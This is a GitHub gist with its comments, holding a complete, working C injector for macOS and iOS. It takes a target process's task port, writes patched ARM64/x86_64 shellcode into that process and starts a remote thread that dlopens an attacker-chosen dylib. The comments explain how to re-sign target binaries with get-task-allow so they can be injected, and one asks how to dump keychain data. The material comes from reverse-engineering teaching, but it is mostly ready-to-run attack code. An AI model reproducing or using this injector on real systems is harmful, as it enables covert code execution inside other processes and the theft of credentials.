-
-
Save vocaeq/fbac63d5d36bc6e1d6d99df9c92f75dc to your computer and use it in GitHub Desktop.
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <dlfcn.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/sysctl.h>
#include <sys/types.h>
#include <mach/mach.h>
#include <mach/error.h>
#ifdef __arm64__ | |
//#include "mach/arm/thread_status.h" | |
// Apple says: mach/mach_vm.h:1:2: error: mach_vm.h unsupported | |
// And I say, bullshit. | |
kern_return_t mach_vm_allocate | |
( | |
vm_map_t target, | |
mach_vm_address_t *address, | |
mach_vm_size_t size, | |
int flags | |
); | |
kern_return_t mach_vm_write | |
( | |
vm_map_t target_task, | |
mach_vm_address_t address, | |
vm_offset_t data, | |
mach_msg_type_number_t dataCnt | |
); | |
#else | |
#include <mach/mach_vm.h> | |
#endif | |
#define STACK_SIZE 65536 | |
#define CODE_SIZE 128 | |
// | |
// Based on http://newosxbook.com/src.jl?tree=listings&file=inject.c | |
// Updated to work on Mojave by creating a stub mach thread that then | |
// creates a real pthread. Injected mach thread is terminated to clean | |
// up as well. | |
// | |
// Due to popular request: | |
// | |
// Simple injector example (and basis of coreruption tool). | |
// | |
// If you've looked into research on injection techniques in OS X, you | |
// probably know about mach_inject. This tool, part of Dino Dai Zovi's | |
// excellent "Mac Hacker's Handbook" (a must read - kudos, DDZ) was | |
// created to inject code in PPC and i386. Since I couldn't find anything | |
// for x86_64 or ARM, I ended up writing my own tool. | |
// Since, this tool has exploded in functionality - with many other features, | |
// including scriptable debugging, fault injection, function hooking, code | |
// decryption, and what not - which comes in *really* handy on iOS. | |
// | |
// coreruption is still closed source, due to its highly.. uhm.. useful
// nature. But I'm making this sample free, and I have fully annotated this.
// The rest of the stuff you need is in Chapters 11 and 12 MOXiI 1, with more | |
// to come in the 2nd Ed (..in time for iOS 9 :-) | |
// | |
// Go forth and spread your code :-) | |
// | |
// J (info@newosxbook.com) 02/05/2014 | |
// | |
// v2: With ARM64 - 06/02/2015 NOTE - ONLY FOR **ARM64**, NOT ARM32! | |
// Get the full bundle at - http://NewOSXBook.com/files/injarm64.tar | |
// with sample dylib and with script to compile this neatly. | |
// | |
//********************************************************************** | |
// Note ARM code IS messy, and I left the addresses wide apart. That's | |
// intentional. Basic ARM64 assembly will enable you to tidy this up and | |
// make the code more compact. | |
// | |
// This is *not* meant to be neat - I'm just preparing this for TG's | |
// upcoming OS X/iOS RE course (http://technologeeks.com/OSXRE) and thought | |
// this would be interesting to share. See you all in MOXiI 2nd Ed! | |
//********************************************************************** | |
// The original sample called pthread_set_self to promote the injected thread
// to a pthread first - otherwise dlopen and many other calls (which rely
// on pthread_self()) will crash. This version instead has the injected Mach
// thread call pthread_create_from_mach_thread; the pthread created that way
// calls dlopen() to load the library specified - which will trigger
// the library's constructor (q.e.d as far as code injection is concerned).
// The injected Mach thread then spins in a loop. You can of course replace
// the loop with another function, such as pthread_exit(), etc.
// | |
// (For the constructor, use: | |
// | |
// static void whicheverfunc() __attribute__((constructor)); | |
// | |
// in the library you inject) | |
// | |
// Note that the functions are shown here as "PTHRDCRT", "DLOPEN__" and "PTHRDEXT".
// Reason being, that the above are merely placeholders which will be patched with
// the runtime addresses when code is actually injected.
char injectedCode[] = | |
#ifdef X86_64 | |
// "\xCC" // int3 | |
"\x55" // push rbp | |
"\x48\x89\xE5" // mov rbp, rsp | |
"\x48\x83\xEC\x10" // sub rsp, 0x10 | |
"\x48\x8D\x7D\xF8" // lea rdi, qword [rbp+var_8] | |
"\x31\xC0" // xor eax, eax | |
"\x89\xC1" // mov ecx, eax | |
"\x48\x8D\x15\x21\x00\x00\x00" // lea rdx, qword ptr [rip + 0x21] | |
"\x48\x89\xCE" // mov rsi, rcx | |
"\x48\xB8" // movabs rax, pthread_create_from_mach_thread | |
"PTHRDCRT" | |
"\xFF\xD0" // call rax | |
"\x89\x45\xF4" // mov dword [rbp+var_C], eax | |
"\x48\x83\xC4\x10" // add rsp, 0x10 | |
"\x5D" // pop rbp | |
"\x48\xc7\xc0\x13\x0d\x00\x00" // mov rax, 0xD13 | |
"\xEB\xFE" // jmp 0x0 | |
"\xC3" // ret | |
"\x55" // push rbp | |
"\x48\x89\xE5" // mov rbp, rsp | |
"\x48\x83\xEC\x10" // sub rsp, 0x10 | |
"\xBE\x01\x00\x00\x00" // mov esi, 0x1 | |
"\x48\x89\x7D\xF8" // mov qword [rbp+var_8], rdi | |
"\x48\x8D\x3D\x1D\x00\x00\x00" // lea rdi, qword ptr [rip + 0x2c] | |
"\x48\xB8" // movabs rax, dlopen | |
"DLOPEN__" | |
"\xFF\xD0" // call rax | |
"\x31\xF6" // xor esi, esi | |
"\x89\xF7" // mov edi, esi | |
"\x48\x89\x45\xF0" // mov qword [rbp+var_10], rax | |
"\x48\x89\xF8" // mov rax, rdi | |
"\x48\x83\xC4\x10" // add rsp, 0x10 | |
"\x5D" // pop rbp | |
"\xC3" // ret | |
"LIBLIBLIBLIB" | |
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" | |
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" | |
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" | |
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; | |
#else | |
//"\x20\x8e\x38\xd4" //brk #0xc471 | |
"\xe0\x03\x00\x91\x00\x40\x00\xd1\xe1\x03\x1f\xaa\xe3\x03\x1f\xaa\xc4\x00\x00\x10\x62\x01\x00\x10\x85\x00\x40\xf9\xa0\x00\x3f\xd6\x07\x00\x00\x10\xe0\x00\x1f\xd6\x50\x54\x48\x52\x44\x43\x52\x54\x44\x4c\x4f\x50\x45\x4e\x5f\x5f\x50\x54\x48\x52\x44\x45\x58\x54\x21\x00\x80\xd2\xc0\x00\x00\x10\x47\xff\xff\x10\xe8\x00\x40\xf9\x00\x01\x3f\xd6\x67\xfe\xff\x10\xe0\x00\x1f\xd6\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42"; | |
/* | |
Compile: as shellcode.asm -o shellcode.o && ld ./shellcode.o -o shellcode -lSystem -syslibroot `xcrun -sdk macosx --show-sdk-path` | |
.global _main | |
.align 4 | |
_main: | |
mov x0, sp | |
sub x0, x0, #16 | |
mov x1, xzr | |
mov x3, xzr | |
adr x4, pthrdcrt | |
adr x2, _thread | |
ldr x5, [x4] | |
blr x5 | |
_loop: | |
adr x7, _loop | |
br x7 | |
pthrdcrt: .ascii "PTHRDCRT" | |
dlllopen: .ascii "DLOPEN__" | |
pthrdext: .ascii "PTHRDEXT" | |
_thread: | |
mov x1, #1 | |
adr x0, lib | |
adr x7, dlllopen | |
ldr x8, [x7] | |
blr x8 | |
adr x7, _loop | |
br x7 | |
lib: .ascii "LIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIB" | |
*/ | |
#endif | |
int inject(pid_t pid, const char *lib) | |
{ | |
task_t remoteTask; | |
struct stat buf; | |
/** | |
* First, check we have the library. Otherwise, we won't be able to inject.. | |
*/ | |
int rc = stat(lib, &buf); | |
if (rc != 0) { | |
fprintf(stderr, "Unable to open library file %s (%s) - Cannot inject\n", lib, strerror(errno)); | |
//return (-9); | |
} | |
mach_error_t kr = 0; | |
/** | |
* Second - the critical part - we need task_for_pid in order to get the task port of the target | |
* pid. This is our do-or-die: If we get the port, we can do *ANYTHING* we want. If we don't, we're | |
* #$%#$%. | |
* | |
* In iOS, this will require the task_for_pid-allow entitlement. In OS X, this will require getting past | |
* taskgated, but root access suffices for that. | |
* | |
*/ | |
kr = task_for_pid(mach_task_self(), pid, &remoteTask); | |
if (kr != KERN_SUCCESS) { | |
fprintf(stderr, "Unable to call task_for_pid on pid %d: %s. Cannot continue!\n", pid, mach_error_string(kr)); | |
return (-1); | |
} | |
/** | |
* From here on, it's pretty much straightforward - | |
* Allocate stack and code. We don't really care *where* they get allocated. Just that they get allocated. | |
* So, first, stack: | |
*/ | |
mach_vm_address_t remoteStack64 = (vm_address_t)NULL; | |
mach_vm_address_t remoteCode64 = (vm_address_t)NULL; | |
kr = mach_vm_allocate(remoteTask, &remoteStack64, STACK_SIZE, VM_FLAGS_ANYWHERE); | |
if (kr != KERN_SUCCESS) { | |
fprintf(stderr, "Unable to allocate memory for remote stack in thread: Error %s\n", mach_error_string(kr)); | |
return (-2); | |
} | |
else { | |
fprintf(stderr, "Allocated remote stack @0x%llx\n", remoteStack64); | |
} | |
/** | |
* Then we allocate the memory for the thread | |
*/ | |
remoteCode64 = (vm_address_t)NULL; | |
kr = mach_vm_allocate(remoteTask, &remoteCode64, CODE_SIZE, VM_FLAGS_ANYWHERE); | |
if (kr != KERN_SUCCESS) { | |
fprintf(stderr, "Unable to allocate memory for remote code in thread: Error %s\n", mach_error_string(kr)); | |
return (-2); | |
} | |
/** | |
* Patch code before injecting: That is, insert correct function addresses (and lib name) into placeholders | |
* | |
* Since we use the same shared library cache as our victim, meaning we can use memory addresses from | |
* OUR address space when we inject.. | |
*/ | |
int i = 0; | |
char *possiblePatchLocation = (injectedCode); | |
for (i = 0; i < 0x100; i++) { | |
// Patching is crude, but works. | |
// | |
extern void *_pthread_set_self; | |
possiblePatchLocation++; | |
uint64_t addrOfPthreadCreate = (uint64_t)dlsym(RTLD_DEFAULT, "pthread_create_from_mach_thread"); | |
uint64_t addrOfPthreadExit = (uint64_t)dlsym(RTLD_DEFAULT, "pthread_exit"); | |
uint64_t addrOfDlopen = (uint64_t)dlopen; | |
if (memcmp(possiblePatchLocation, "PTHRDCRT", 8) == 0) { | |
printf("pthread_create_from_mach_thread @%llx\n", addrOfPthreadCreate); | |
memcpy(possiblePatchLocation, &addrOfPthreadCreate, 8); | |
} | |
if (memcmp(possiblePatchLocation, "PTHRDEXT", 8) == 0) { | |
printf("pthread_exit @%llx\n", addrOfPthreadExit); | |
memcpy(possiblePatchLocation, &addrOfPthreadCreate, 8); | |
} | |
if (memcmp(possiblePatchLocation, "DLOPEN__", 6) == 0) { | |
printf("dlopen @%llx\n", addrOfDlopen); | |
memcpy(possiblePatchLocation, &addrOfDlopen, sizeof(uint64_t)); | |
} | |
if (memcmp(possiblePatchLocation, "LIBLIBLIB", 9) == 0) { | |
strcpy(possiblePatchLocation, lib); | |
} | |
} | |
/** | |
* Write the (now patched) code | |
*/ | |
kr = mach_vm_write(remoteTask, // Task port | |
remoteCode64, // Virtual Address (Destination) | |
(vm_address_t)injectedCode, // Source | |
sizeof(injectedCode)); // Length of the source | |
if (kr != KERN_SUCCESS) { | |
fprintf(stderr, "Unable to write remote thread memory: Error %s\n", mach_error_string(kr)); | |
return (-3); | |
} | |
/* | |
* Mark code as executable - This also requires a workaround on iOS, btw. | |
*/ | |
kr = vm_protect(remoteTask, remoteCode64, sizeof(injectedCode), FALSE, VM_PROT_READ | VM_PROT_EXECUTE); | |
/* | |
* Mark stack as writable - not really necessary | |
*/ | |
kr = vm_protect(remoteTask, remoteStack64, STACK_SIZE, TRUE, VM_PROT_READ | VM_PROT_WRITE); | |
if (kr != KERN_SUCCESS) { | |
fprintf(stderr, "Unable to set memory permissions for remote thread: Error %s\n", mach_error_string(kr)); | |
return (-4); | |
} | |
/* | |
* Create thread - This is obviously hardware specific. | |
*/ | |
#ifdef X86_64 | |
x86_thread_state64_t remoteThreadState64; | |
#else | |
// Using unified thread state for backporting to ARMv7, if anyone's interested.. | |
struct arm_unified_thread_state remoteThreadState64; | |
#endif | |
thread_act_t remoteThread; | |
memset(&remoteThreadState64, '\0', sizeof(remoteThreadState64) ); | |
remoteStack64 += (STACK_SIZE / 2); // this is the real stack | |
//remoteStack64 -= 8; // need alignment of 16 | |
const char* p = (const char*) remoteCode64; | |
#ifdef X86_64 | |
remoteThreadState64.__rip = (u_int64_t) (vm_address_t) remoteCode64; | |
// set remote Stack Pointer | |
remoteThreadState64.__rsp = (u_int64_t) remoteStack64; | |
remoteThreadState64.__rbp = (u_int64_t) remoteStack64; | |
#else | |
// Note the similarity - all we change are a couple of regs. | |
remoteThreadState64.ash.flavor = ARM_THREAD_STATE64; | |
remoteThreadState64.ash.count = ARM_THREAD_STATE64_COUNT; | |
remoteThreadState64.ts_64.__pc = (u_int64_t) remoteCode64; | |
remoteThreadState64.ts_64.__sp = (u_int64_t) remoteStack64; | |
// __uint64_t __x[29]; /* General purpose registers x0-x28 */ | |
#endif | |
printf ("Remote Stack 64 0x%llx, Remote code is %p\n", remoteStack64, p ); | |
/* | |
* create thread and launch it in one go | |
*/ | |
#ifdef X86_64 | |
kr = thread_create_running( remoteTask, x86_THREAD_STATE64, | |
(thread_state_t) &remoteThreadState64, x86_THREAD_STATE64_COUNT, &remoteThread ); | |
#else // __arm64__ | |
kr = thread_create_running( remoteTask, ARM_THREAD_STATE64, // ARM_THREAD_STATE64, | |
(thread_state_t) &remoteThreadState64.ts_64, ARM_THREAD_STATE64_COUNT , &remoteThread ); | |
#endif | |
if (kr != KERN_SUCCESS) { fprintf(stderr,"Unable to create remote thread: error %s", mach_error_string (kr)); | |
return (-3); } | |
return (0); | |
} | |
/**
 * Command-line entry point: inject <pid> <path-to-dylib>.
 *
 * Validates the pid argument and the existence of the dylib, then calls
 * inject(). The exit status is EXIT_SUCCESS only when the injection succeeded;
 * usage errors, an invalid pid, a missing dylib and injection failures all
 * yield EXIT_FAILURE.
 */
int main(int argc, const char *argv[])
{
    if (argc < 3) {
        fprintf(stderr, "Usage: %s _pid_ _action_\n", argv[0]);
        fprintf(stderr, " _action_: path to a dylib on disk\n");
        return EXIT_FAILURE;
    }

    // strtol instead of atoi: atoi silently turns garbage into pid 0.
    char *end = NULL;
    errno = 0;
    long parsedPid = strtol(argv[1], &end, 10);
    if (errno != 0 || end == argv[1] || *end != '\0' ||
        parsedPid <= 0 || (long)(pid_t)parsedPid != parsedPid) {
        fprintf(stderr, "Invalid pid: %s\n", argv[1]);
        return EXIT_FAILURE;
    }
    pid_t pid = (pid_t)parsedPid;

    const char *action = argv[2];
    struct stat buf;
    if (stat(action, &buf) != 0) {
        fprintf(stderr, "Dylib not found\n");
        return EXIT_FAILURE;
    }

    // Propagate the injection result to the shell.
    return inject(pid, action) == 0 ? EXIT_SUCCESS : EXIT_FAILURE;
}
@C0HERENCE I'm almost positive the shell code is for x86_64 processes and not arm64
@brandonros Nope. It's arm64
code and it's quite easy to verify that:
Compile:
clang inject.c -o inject
Check target architectures:
lipo -archs inject
arm64
Disassemble:
objdump -D inject
The disassembly of the __DATA
prints:
Disassembly of section __DATA,__data:
0000000100008000 <_injectedCode>:
100008000: e0 03 00 91 mov x0, sp
100008004: 00 40 00 d1 sub x0, x0, #16
100008008: e1 03 1f aa mov x1, xzr
10000800c: e3 03 1f aa mov x3, xzr
100008010: c4 00 00 10 adr x4, #24
100008014: 22 01 00 10 adr x2, #36
100008018: 85 00 40 f9 ldr x5, [x4]
10000801c: a0 00 3f d6 blr x5
100008020: 07 00 00 10 adr x7, #0
100008024: e0 00 1f d6 br x7
100008028: 50 54 48 52 <unknown>
10000802c: 44 43 52 54 b.mi 0x1000ac894 <_injectedCode+0xa4894>
100008030: 44 4c 4f 50 adr x4, #649610
100008034: 45 4e 5f 5f <unknown>
100008038: 21 00 80 d2 mov x1, #1
10000803c: 80 00 00 10 adr x0, #16
100008040: 87 ff ff 10 adr x7, #-16
100008044: e8 00 40 f9 ldr x8, [x7]
100008048: 00 01 3f d6 blr x8
10000804c: 4c 49 42 4c <unknown>
100008050: 49 42 4c 49 <unknown>
100008054: 42 4c 49 42 <unknown>
100008058: 4c 49 42 4c <unknown>
10000805c: 49 42 4c 49 <unknown>
100008060: 42 4c 49 42 <unknown>
100008064: 4c 49 42 4c <unknown>
100008068: 49 42 4c 49 <unknown>
10000806c: 42 4c 49 42 <unknown>
100008070: 4c 49 42 4c <unknown>
100008074: 49 42 4c 49 <unknown>
100008078: 42 4c 49 42 <unknown>
10000807c: 4c 49 42 4c <unknown>
100008080: 49 42 4c 49 <unknown>
100008084: 42 4c 49 42 <unknown>
100008088: 4c 49 42 4c <unknown>
10000808c: 49 42 4c 49 <unknown>
100008090: 42 4c 49 42 <unknown>
100008094: 4c 49 42 4c <unknown>
100008098: 49 42 4c 49 <unknown>
10000809c: 42 4c 49 42 <unknown>
1000080a0: 00 <unknown>
I tested this fork using an arm64 dylib and it worked fine.
i got Unable to call task_for_pid on pid 0: (os/kern) failure. Cannot continue!
on mac m1 11.2.1
dylib code
#include <stdio.h>
int main()
{
printf("hello, world!\n");
return 0;
}
@1337kingOf The task_for_pid call requires elevated permissions. Run the injector as root (or with sudo).
@1337kingOf The task_for_pid call requires elevated permissions. Run the injector as root (or with sudo).
yeah im using sudo ofc
i still get
Unable to call task_for_pid on pid 37907: (os/kern) failure. Cannot continue!
Yeah, this code is arm64. I’ve ported the shellcode as an exercise for myself. I was tired and didn’t realize that I missed one part of shellcode and right after executing code, it does not close a thread if I remember correctly and just executes some garbage which is why the program crashes. Maybe one day I’ll find some time to fix it🤔
@vocaeq but my dylib cant run at all
and by the way maybe u know how to read login.keychain-db and dump all data ?
@1337kingOf @StarHack The requirements for app to be injectable on arm64 Mac's is:
- No hardened runtime on the binary we're injecting into
- Signed with get-task-allow entitlement
As long as those two requirements are fulfilled, you should not have a problem injecting into the process. I just checked on my M1 on the newest macOS and everything works just fine (besides crashing after code execution, but that's a different issue).
Edit: You don't need sudo.
@1337kingOf I got the same result. do u have resolved it?
@NeeSDev @1337kingOf @C0HERENCE I've just updated the code so it won't crash. I ran into some issues closing the thread, so I just put it in a loop, and it works. I don't have time for a proper fix right now.
My first guess is that the "task_for_pid on pid 37907: (os/kern) failure" error means the target binary is either signed with the hardened runtime or does not have the get-task-allow entitlement.
Use this plist to sign the binary: ldid -Sent.xml ./binary
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>com.apple.security.get-task-allow</key>
<true/>
</dict>
</plist>
Then it should work. Also try modifying your dylib into:
#include <stdio.h>
__attribute__((constructor))
static void testconstructor(int argc, const char **argv)
{
printf("Hello World");
}
hey @vocaeq , excellent work with adapting this to arm, I have tried your very simple printf dylib, and also one that writes into a file, but it seems the code is not executed at all.
I compile the injector with gcc and the dylib with gcc or g++, with the -dynamiclib flag. I see no errors or crashes, the app continues to run, but it doesn't seem like my code is executed.
Would you happen to know why could it be?
@Szustarol Did you debug your app in lldb
?
lldb yourapp
r
CTRL+C
thread backtrace all
c
Then run injector (sudo
or with privileged access).
CTRL+C
thread backtrace all
Did you see the new thread, or is it missing altogether? We used a different implementation of this code in production and it's working perfectly fine.
i test it on my M2 macbook pro, OS 12.5 (21G72), codes in the dylib executes successfully, but the victim process just crashed.
part of apples crash report are here